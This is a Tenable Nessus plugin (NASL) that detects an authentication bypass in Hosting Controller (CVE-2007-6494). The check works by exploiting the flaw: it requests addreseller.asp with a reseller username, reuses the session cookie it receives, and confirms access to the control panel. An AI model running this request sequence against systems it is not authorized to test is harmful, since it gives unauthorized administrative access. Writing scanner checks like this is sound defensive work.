#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(31191);
  script_version("$Revision: 1.1 $");

  script_cve_id("CVE-2007-6494");
  script_bugtraq_id(26862);
  script_xref(name:"milw0rm", value:"4730");
  script_xref(name:"Secunia", value:"28973");

  script_name(english:"Hosting Controller Authentication Bypass Vulnerability");
  script_summary(english:"Tries to access a user's control panel");

  desc = "
Synopsis :

The remote web server contains an ASP application that allows a remote
attacker to bypass authentication. 

Description :

The version of Hosting Controller installed on the remote host allows
a remote attacker to bypass authentication and gain access to an
arbitrary user's control panel, including as an administrator. 

See also :

http://archives.neohapsis.com/archives/bugtraq/2007-12/0170.html
http://hostingcontroller.com/english/logs/Post-Hotfix-3_3-sec-Patch-ReleaseNotes.html

Solution :

Apply the Post Hotfix 3.3 Security Patch. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 8077);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:8077);
if (!get_port_state(port)) exit(0);
if (!can_host_asp(port:port)) exit(0);


# Name of a user to authenticate as.
#username = "hcadmin";                  # should work
username = "resadmin";


# Loop through various directories.
if (thorough_tests) dirs = make_list("/hc", "/hosting_controller", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  req = http_get(
    item:string(dir, "/hosting/addreseller.asp?reseller=", username),
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
  if (res == NULL) exit(0);

  if (
    "ActionType=AddUser" >< res &&
    "Set-Cookie: " >< res
  )
  {
    # Extract the session cookie.
    cookie = NULL;

    pat = '^Set-Cookie:.* (ASPSESSIONID[^; ]+=[^; ]+)';
    matches = egrep(pattern:pat, string:res);
    if (matches)
    {
      foreach match (split(matches))
      {
        match = chomp(match);
        item = eregmatch(pattern:pat, string:match);
        if (!isnull(item))
        {
          cookie = item[1];
          break;
        }
      }
    }

    if (isnull(cookie))
    {
      if (log_verbosity > 1)
      {
        debug_print("couldn't find the cookie!", level:0);
      }
    }
    else
    {
      postdata = string(
        "TemplateSkin=PanelXP/Blue"
      );
      req = string(
        "POST /AdminSettings/displays.asp?DecideAction=1&ChangeSkin=1 HTTP/1.1\r\n",
        "Host: ", get_host_name(), "\r\n",
        "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
        "Cookie: ", cookie, "\r\n",
        "Content-Type: application/x-www-form-urlencoded\r\n",
        "Content-Length: ", strlen(postdata), "\r\n",
        "\r\n",
        postdata
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);

      req = http_get(item:string(dir, "/Contents.asp"), port:port);
      req = str_replace(
        string:req,
        find:"User-Agent:",
        replace:string(
          "Cookie: ", cookie, "\r\n",
          "User-Agent:"
        )
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);

      # There's a problem if we now have access to the user's control panel.
      if ("accounts/dsp_profile.asp" >< res)
      {
        security_hole(port);
        exit(0);
      }
    }
  }
}
